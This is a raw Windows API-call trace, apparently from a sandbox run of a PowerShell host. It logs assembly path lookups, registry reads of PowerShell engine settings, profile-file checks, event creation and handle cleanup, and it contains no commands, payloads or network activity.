	[0496.349] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22c620, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0496.349] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22c570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0496.349] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22c570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0496.349] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22c620, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0496.350] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22c570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0496.350] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22c570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0497.807] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22c5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0497.807] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22c500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0497.807] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22c500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0497.807] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22c5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0497.808] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22c500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0497.808] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22c500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0497.808] VirtualQuery (in: lpAddress=0x22bc30, lpBuffer=0x22caf0, dwLength=0x30 | out: lpBuffer=0x22caf0*(BaseAddress=0x22b000, AllocationBase=0x1b0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0497.813] CoTaskMemAlloc (cb=0x104) returned 0x1b39cff0
	[0497.813] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b39cff0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0497.813] CoTaskMemFree (pv=0x1b39cff0) 
	[0497.824] CoTaskMemAlloc (cb=0x104) returned 0x1b39cff0
	[0497.824] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b39cff0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0497.825] CoTaskMemFree (pv=0x1b39cff0) 
	[0497.825] CoTaskMemAlloc (cb=0x104) returned 0x1b39cff0
	[0497.825] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b39cff0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0497.825] CoTaskMemFree (pv=0x1b39cff0) 
	[0497.826] CoTaskMemAlloc (cb=0x104) returned 0x1b39cff0
	[0497.826] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b39cff0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0497.826] CoTaskMemFree (pv=0x1b39cff0) 
	[0497.832] CoTaskMemAlloc (cb=0x104) returned 0x1b39cff0
	[0497.832] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b39cff0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0497.832] CoTaskMemFree (pv=0x1b39cff0) 
	[0498.506] CoTaskMemAlloc (cb=0x104) returned 0x1b39cff0
	[0498.506] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b39cff0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0498.506] CoTaskMemFree (pv=0x1b39cff0) 
	[0498.508] CoTaskMemAlloc (cb=0x104) returned 0x1b39cff0
	[0498.508] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b39cff0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0498.508] CoTaskMemFree (pv=0x1b39cff0) 
	[0498.513] VirtualQuery (in: lpAddress=0x22bc30, lpBuffer=0x22caf0, dwLength=0x30 | out: lpBuffer=0x22caf0*(BaseAddress=0x22b000, AllocationBase=0x1b0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0499.264] VirtualQuery (in: lpAddress=0x22bc30, lpBuffer=0x22caf0, dwLength=0x30 | out: lpBuffer=0x22caf0*(BaseAddress=0x22b000, AllocationBase=0x1b0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0499.306] CoTaskMemAlloc (cb=0x104) returned 0x1b39cff0
	[0499.306] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b39cff0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0499.306] CoTaskMemFree (pv=0x1b39cff0) 
	[0501.241] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x1b39d100
	[0501.244] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x1b39d210
	[0504.715] CoTaskMemAlloc (cb=0x104) returned 0x1b39d320
	[0504.715] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b39d320, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0504.715] CoTaskMemFree (pv=0x1b39d320) 
	[0504.724] CoTaskMemAlloc (cb=0x104) returned 0x1b39d320
	[0504.724] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b39d320, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0504.724] CoTaskMemFree (pv=0x1b39d320) 
	[0504.725] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22c890, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0504.725] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22c7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0504.725] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22c7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0504.725] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22c7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0505.247] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22c890, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0505.247] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22c7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0505.247] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22c7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0505.247] VirtualQuery (in: lpAddress=0x22bee0, lpBuffer=0x22cda0, dwLength=0x30 | out: lpBuffer=0x22cda0*(BaseAddress=0x22b000, AllocationBase=0x1b0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0505.253] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x22dd38 | out: phkResult=0x22dd38*=0x348) returned 0x0
	[0505.253] RegQueryValueExW (in: hKey=0x348, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x22dcbc, lpData=0x0, lpcbData=0x22dcb8*=0x0 | out: lpType=0x22dcbc*=0x1, lpData=0x0, lpcbData=0x22dcb8*=0x56) returned 0x0
	[0505.253] CoTaskMemAlloc (cb=0x5a) returned 0x1b3c1a30
	[0505.253] RegQueryValueExW (in: hKey=0x348, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x22dc8c, lpData=0x1b3c1a30, lpcbData=0x22dc88*=0x56 | out: lpType=0x22dc8c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x22dc88*=0x56) returned 0x0
	[0505.253] CoTaskMemFree (pv=0x1b3c1a30) 
	[0505.253] RegCloseKey (hKey=0x348) returned 0x0
	[0505.253] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x22dd38 | out: phkResult=0x22dd38*=0x348) returned 0x0
	[0505.254] RegQueryValueExW (in: hKey=0x348, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x22dcbc, lpData=0x0, lpcbData=0x22dcb8*=0x0 | out: lpType=0x22dcbc*=0x1, lpData=0x0, lpcbData=0x22dcb8*=0x56) returned 0x0
	[0505.254] CoTaskMemAlloc (cb=0x5a) returned 0x1b3c1a30
	[0505.254] RegQueryValueExW (in: hKey=0x348, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x22dc8c, lpData=0x1b3c1a30, lpcbData=0x22dc88*=0x56 | out: lpType=0x22dc8c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x22dc88*=0x56) returned 0x0
	[0505.254] CoTaskMemFree (pv=0x1b3c1a30) 
	[0505.254] RegCloseKey (hKey=0x348) returned 0x0
	[0505.255] CoTaskMemAlloc (cb=0x20c) returned 0x3782c0
	[0505.256] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x3782c0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0505.599] CoTaskMemFree (pv=0x3782c0) 
	[0505.599] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x22d8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0505.599] CoTaskMemAlloc (cb=0x20c) returned 0x3782c0
	[0505.599] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x3782c0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0505.599] CoTaskMemFree (pv=0x3782c0) 
	[0505.599] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x22d8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0505.602] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", nBufferLength=0x105, lpBuffer=0x22da90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", lpFilePart=0x0) returned 0x36
	[0505.602] SetErrorMode (uMode=0x1) returned 0x1
	[0505.602] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x22dca0 | out: lpFileInformation=0x22dca0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0505.602] SetErrorMode (uMode=0x1) returned 0x1
	[0505.602] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x22da90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x4b
	[0505.602] SetErrorMode (uMode=0x1) returned 0x1
	[0505.602] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x22dca0 | out: lpFileInformation=0x22dca0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0505.602] SetErrorMode (uMode=0x1) returned 0x1
	[0505.603] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", nBufferLength=0x105, lpBuffer=0x22da90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", lpFilePart=0x0) returned 0x45
	[0505.603] SetErrorMode (uMode=0x1) returned 0x1
	[0505.603] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x22dca0 | out: lpFileInformation=0x22dca0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0505.603] SetErrorMode (uMode=0x1) returned 0x1
	[0505.603] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x22da90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x5a
	[0505.603] SetErrorMode (uMode=0x1) returned 0x1
	[0505.603] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x22dca0 | out: lpFileInformation=0x22dca0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0505.603] SetErrorMode (uMode=0x1) returned 0x1
	[0505.606] CoTaskMemAlloc (cb=0x104) returned 0x1b39d320
	[0505.606] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b39d320, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0505.606] CoTaskMemFree (pv=0x1b39d320) 
	[0505.607] CoTaskMemAlloc (cb=0x104) returned 0x1b39d320
	[0505.607] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b39d320, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0505.607] CoTaskMemFree (pv=0x1b39d320) 
	[0505.610] CoTaskMemAlloc (cb=0x104) returned 0x1b39d320
	[0505.610] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b39d320, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0505.610] CoTaskMemFree (pv=0x1b39d320) 
	[0505.612] CoTaskMemAlloc (cb=0x104) returned 0x1b39d320
	[0505.612] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b39d320, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0505.612] CoTaskMemFree (pv=0x1b39d320) 
	[0505.619] CoTaskMemAlloc (cb=0x104) returned 0x1b39d320
	[0505.619] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b39d320, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0505.619] CoTaskMemFree (pv=0x1b39d320) 
	[0505.621] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x350
	[0505.621] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x34c
	[0505.621] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x330
	[0505.622] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x2ec
	[0505.622] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x1d8
	[0505.622] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x338
	[0505.622] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x38c
	[0505.622] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x390
	[0505.622] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x340
	[0505.622] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x35c
	[0505.622] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x360
	[0505.622] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x364
	[0505.624] CoTaskMemAlloc (cb=0x104) returned 0x1b39d320
	[0505.625] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b39d320, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0505.625] CoTaskMemFree (pv=0x1b39d320) 
	[0505.627] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
	[0505.627] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x22de80 | out: lpMode=0x22de80) returned 1
	[0509.056] CoTaskMemAlloc (cb=0x104) returned 0x1b39d320
	[0509.056] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b39d320, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0509.057] CoTaskMemFree (pv=0x1b39d320) 
	[0509.061] SetEvent (hEvent=0x2ec) returned 1
	[0509.061] SetEvent (hEvent=0x350) returned 1
	[0509.061] SetEvent (hEvent=0x34c) returned 1
	[0509.061] SetEvent (hEvent=0x330) returned 1
	[0509.062] CoTaskMemAlloc (cb=0x104) returned 0x1b39d320
	[0509.063] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b39d320, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0509.063] CoTaskMemFree (pv=0x1b39d320) 
	[0509.064] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0x22dbd8 | out: phkResult=0x22dbd8*=0x36c) returned 0x0
	[0509.064] RegQueryValueExW (in: hKey=0x36c, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0x22db5c, lpData=0x0, lpcbData=0x22db58*=0x0 | out: lpType=0x22db5c*=0x0, lpData=0x0, lpcbData=0x22db58*=0x0) returned 0x2

Thread:
	id = 329
	os_tid = 0xfe8


Thread:
	id = 336
	os_tid = 0xc4c


Thread:
	id = 626
	os_tid = 0xe54


Thread:
	id = 631
	os_tid = 0x134c


Thread:
	id = 640
	os_tid = 0x142c


Thread:
	id = 695
	os_tid = 0x15cc


Thread:
	id = 696
	os_tid = 0x15d0

	[0437.323] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0470.765] LocalFree (hMem=0x387340) returned 0x0
	[0470.765] CloseHandle (hObject=0x1d8) returned 1
	[0470.765] CloseHandle (hObject=0x13) returned 1
	[0470.766] CloseHandle (hObject=0xf) returned 1
	[0470.766] RegCloseKey (hKey=0x314) returned 0x0
	[0470.767] RegCloseKey (hKey=0x310) returned 0x0
	[0470.767] RegCloseKey (hKey=0x30c) returned 0x0
	[0470.767] LocalFree (hMem=0x387310) returned 0x0
	[0470.767] RegCloseKey (hKey=0x330) returned 0x0
	[0479.625] RegCloseKey (hKey=0x330) returned 0x0
	[0486.787] RegCloseKey (hKey=0x33c) returned 0x0
	[0486.787] RegCloseKey (hKey=0x338) returned 0x0
	[0486.787] RegCloseKey (hKey=0x1d8) returned 0x0
	[0486.787] RegCloseKey (hKey=0x2ec) returned 0x0
	[0486.788] RegCloseKey (hKey=0x330) returned 0x0
	[0486.788] RegCloseKey (hKey=0x350) returned 0x0
	[0486.788] RegCloseKey (hKey=0x34c) returned 0x0
	[0486.788] RegCloseKey (hKey=0x348) returned 0x0
	[0486.788] RegCloseKey (hKey=0x344) returned 0x0
	[0486.789] RegCloseKey (hKey=0x340) returned 0x0
	[0499.296] RegCloseKey (hKey=0x388) returned 0x0
	[0499.297] RegCloseKey (hKey=0x384) returned 0x0
	[0499.297] RegCloseKey (hKey=0x380) returned 0x0
	[0499.297] RegCloseKey (hKey=0x37c) returned 0x0
	[0499.297] RegCloseKey (hKey=0x33c) returned 0x0
	[0499.298] RegCloseKey (hKey=0x394) returned 0x0
	[0499.298] RegCloseKey (hKey=0x374) returned 0x0
	[0499.298] RegCloseKey (hKey=0x370) returned 0x0
	[0499.298] RegCloseKey (hKey=0x36c) returned 0x0
	[0499.299] RegCloseKey (hKey=0x368) returned 0x0
	[0499.299] RegCloseKey (hKey=0x364) returned 0x0
	[0499.299] RegCloseKey (hKey=0x360) returned 0x0
	[0499.299] RegCloseKey (hKey=0x35c) returned 0x0
	[0499.300] RegCloseKey (hKey=0x340) returned 0x0
	[0499.300] RegCloseKey (hKey=0x390) returned 0x0
	[0499.300] RegCloseKey (hKey=0x38c) returned 0x0
	[0499.300] RegCloseKey (hKey=0x338) returned 0x0
	[0499.301] RegCloseKey (hKey=0x1d8) returned 0x0
	[0499.301] RegCloseKey (hKey=0x2ec) returned 0x0
	[0499.301] RegCloseKey (hKey=0x330) returned 0x0
	[0499.301] RegCloseKey (hKey=0x350) returned 0x0
	[0499.302] RegCloseKey (hKey=0x34c) returned 0x0
	[0499.302] RegCloseKey (hKey=0x348) returned 0x0
	[0499.302] RegCloseKey (hKey=0x344) returned 0x0
	[0542.655] RegCloseKey (hKey=0x36c) returned 0x0
	[0642.440] CloseHandle (hObject=0x328) returned 1
	[0642.440] CloseHandle (hObject=0x310) returned 1
	[0642.441] CloseHandle (hObject=0x380) returned 1
	[0642.441] CloseHandle (hObject=0x36c) returned 1
	[0642.442] CloseHandle (hObject=0x32c) returned 1
	[0642.442] CloseHandle (hObject=0x30c) returned 1
	[0700.857] CloseHandle (hObject=0x384) returned 1
	[0700.858] CloseHandle (hObject=0x328) returned 1
	[0700.858] CloseHandle (hObject=0x388) returned 1
	[0700.873] CloseHandle (hObject=0x310) returned 1
	[0700.874] CloseHandle (hObject=0x32c) returned 1
	[0700.874] CloseHandle (hObject=0x30c) returned 1
	[0783.631] CloseHandle (hObject=0x428) returned 1
	[0783.631] CloseHandle (hObject=0x378) returned 1
	[0783.631] CloseHandle (hObject=0x48c) returned 1
	[0783.632] CloseHandle (hObject=0x490) returned 1
	[0783.632] CloseHandle (hObject=0x3d0) returned 1
	[0783.633] CloseHandle (hObject=0x42c) returned 1
